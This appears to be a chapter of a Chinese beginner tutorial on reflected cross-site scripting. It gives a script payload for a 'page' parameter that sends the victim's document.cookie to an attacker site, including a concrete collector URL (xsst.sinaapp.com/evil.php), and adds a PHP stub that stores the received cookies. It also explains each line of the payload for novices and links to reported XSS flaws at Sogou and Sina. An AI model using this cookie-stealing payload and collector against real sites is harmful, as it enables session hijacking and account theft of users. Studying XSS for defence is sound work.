1.1 最常规的反射型XSS
当然这个只是弹出cookies,只是好看而已。(弹窗一点不好看 T T,没妹子好看!)
我们的目标是将得到的cookies发送到另外一个网站。试试下面的
page=<script>location.href='http://你自己的网站/evil.php?cookie='+encodeURIComponent(document.cookie)</script>
或点以下我所提供的链接(IE8,IE9用户,而且没关XSS筛选器的)
考虑到一些新手,没有JS基础,附上面这段JS代码的解释:
location.href="恶意地址"; //这句话可以让当前页面(location)的地址(href),跳转到恶意地址
document.cookie //就是当前页面的cookies数据
encodeURIComponent(document.cookie) //就是将cookies数据编码一下(防止cookies中有特殊的符号,导致地址错误)
location.href="恶意地址"+encodeURIComponent(document.cookie) //就是将编码后的数据加在恶意地址之后
例如:
location.href='http://xsst.sinaapp.com/evil.php?cookie='+encodeURIComponent(document.cookie)
运行之后,将会跳转到 http://xsst.sinaapp.com/evil.php?cookie=编码后的COOKIES数据
我们在服务器端,只需要用以下PHP代码,就可以获得cookie数据
<?
$cookie=$_GET["cookie"];
存储($cookie); //此句是伪代码
?>
测试最后一个代码之前,很不幸的告诉大家,这样第一章就到此结束了,希望大家对XSS有一个最基本的认识!
下一章,我们将接触更好玩的反射型的XSS!
< 后退 | 前进 | 上一章节 | 下一章节 >
课外阅读:
搜狗的XSS漏洞
新浪一处存在xss漏洞
更多XSS漏洞 ...